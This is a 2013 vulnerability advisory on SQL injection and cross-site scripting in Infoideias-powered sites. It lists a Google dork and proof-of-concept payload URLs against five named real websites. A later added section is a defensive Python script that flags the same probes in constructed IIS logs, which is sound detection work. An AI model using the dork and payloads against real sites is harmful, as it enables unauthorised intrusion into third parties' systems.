Sites powered by Infoideias suffer from cross-site scripting and remote SQL injection vulnerabilities. Note that this advisory has site-specific information.
a0dc4586252b198ea0db1cb5fbbd00714ea51b5c2acecf9616f952e939303aee
#********************************************************************************
# Exploit Title : Infoideias Multiple Vulnerabilities
#
# Exploit Author : Ashiyane Digital Security Team
#
# Software Link : http://www.infoideias.com.br
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:"Powered by Infoideias"
#
# Date: 2013/09/10
#
--------------------------------------------------------------------
# Exploit : Sql Injection
#
# Location : [Target]/incrio/calendar.asp?auxid=[Sql Injection]
#
#
# Proof:
#
# http://www.americansocietyrio.org/incrio/calendar.asp?auxid='
#
# http://www.bcsrio.org.br/incrio/calendar.asp?auxid='
#
# http://www.christchurchrio.org.br/incrio/calendar.asp?auxid='
#
# http://www.riosocieties.com.br//incrio/calendar.asp?auxid='
#
# http://riosocieti.dominiotemporario.com/incrio/calendar.asp?auxid='
#
--------------------------------------------------------------------
# Exploit 2 : Cross site scripting
#
# Location : [Target]/incrio/login.asp?button=Login&login=[Cross Site Scripting]
#
#
# Proof:
#
# http://www.americansocietyrio.org/incrio/login.asp?button=Login&login=
"/><script>alert(1);</script>
#
# http://www.bcsrio.org.br/incrio/incrio/login.asp?button=Login&login=
"/><script>alert(1);</script>
#
# http://www.christchurchrio.org.br/incrio/login.asp?button=Login&login=
"/><script>alert(1);</script>
#
# http://www.riosocieties.com.br/incrio/login.asp?button=Login&login=
"/><script>alert(1);</script>
#
#
# http://riosocieti.dominiotemporario.com/incrio/login.asp?button=Login&login=
"/><script>alert(1);</script>
#
######################
discovered by : ACC3SS
######################
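
Added example, not part of the original advisory: a log check that flags the two request patterns listed above (a non-numeric auxid on calendar.asp, HTML metacharacters in login on login.asp). The log lines are constructed, and the simplified IIS field layout and the assumption that auxid is a numeric id are mine, not the vendor's.

```python
import re
from urllib.parse import parse_qs

# Constructed log lines in a simplified IIS W3C layout (assumed field order):
# date time method uri-stem uri-query client-ip status
SAMPLE_LOG = """\
2013-09-10 10:00:01 GET /incrio/calendar.asp auxid=42 203.0.113.5 200
2013-09-10 10:00:07 GET /incrio/calendar.asp auxid=' 203.0.113.9 500
2013-09-10 10:00:09 GET /incrio/login.asp button=Login&login=maria 203.0.113.5 200
2013-09-10 10:00:15 GET /incrio/login.asp button=Login&login=%22/%3E%3Cscript%3Ealert(1);%3C/script%3E 203.0.113.9 200
2013-09-10 10:00:20 GET /incrio/Calendar.asp auxid=12%27 203.0.113.9 500
"""

NUMERIC = re.compile(r"\d+")        # assumption: auxid is a numeric record id
HTML_META = re.compile(r"[<>\"']")  # characters that can break out of an HTML attribute


def scan(log_text):
    """Return (client_ip, kind, uri_stem, status) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if line.startswith("#") or len(parts) != 7:
            continue  # skip W3C header lines and anything not in the assumed layout
        _date, _time, _method, stem, query, ip, status = parts
        # parse_qs percent-decodes values, so %27 and a raw quote are treated alike
        params = parse_qs(query, keep_blank_values=True)
        path = stem.lower()  # IIS paths are case-insensitive
        if path.endswith("/incrio/calendar.asp"):
            bad = any(not NUMERIC.fullmatch(v) for v in params.get("auxid", []))
            kind = "sqli-probe"
        elif path.endswith("/incrio/login.asp"):
            bad = any(HTML_META.search(v) for v in params.get("login", []))
            kind = "xss-probe"
        else:
            continue
        if bad:
            findings.append((ip, kind, stem, status))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

A 500 status next to a flagged calendar.asp request suggests the malformed value reached the database layer, which is worth prioritising during triage.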